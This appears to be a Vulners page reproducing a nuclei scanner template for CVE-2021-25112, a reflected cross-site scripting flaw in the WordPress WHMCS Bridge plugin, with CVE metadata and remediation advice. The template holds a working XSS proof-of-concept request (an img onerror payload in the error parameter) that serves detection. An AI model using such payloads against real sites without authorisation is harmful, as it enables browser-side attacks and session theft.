Lucene search
K

WordPress WHMCS Bridge <6.4b - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 46 Views

WordPress WHMCS Bridge <6.4b - Reflected XSS Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-25112
27 Apr 202309:58
circl
CNNVD
WordPress plugin WHMCS Bridge 跨站脚本漏洞
28 Feb 202200:00
cnnvd
CNVD
WordPress WHMCS Bridge plugin cross-site scripting vulnerability
2 Mar 202200:00
cnvd
CVE
CVE-2021-25112
28 Feb 202209:06
cve
Cvelist
CVE-2021-25112 WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
28 Feb 202209:06
cvelist
EUVD
EUVD-2021-12024
7 Oct 202500:30
euvd
NVD
CVE-2021-25112
28 Feb 202209:15
nvd
OSV
CVE-2021-25112
28 Feb 202209:15
osv
Patchstack
WordPress WHMCS Bridge plugin <= 6.3 - Reflected Cross-Site Scripting (XSS) vulnerability
27 Jan 202200:00
patchstack
Prion
Cross site scripting
28 Feb 202209:15
prion
Rows per page
id: CVE-2021-25112

info:
  name: WordPress WHMCS Bridge <6.4b - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: |
    WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
    - https://plugins.trac.wordpress.org/changeset/2659751
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25112
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25112
    cwe-id: CWE-79
    epss-score: 0.02187
    epss-percentile: 0.80227
    cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: i-plugins
    product: whmcs_bridge
    framework: wordpress
  tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<strong><img src onerror=alert(document.domain)></strong>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210083a5d3d7228f097c3cab3e90444915fbadf68775631a7f4e8c3b86926bfd23af0220747c2969fafcaa14e601c31690dd5570a14acdaed365de7ab31c7bdc0180ed0c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.02187
46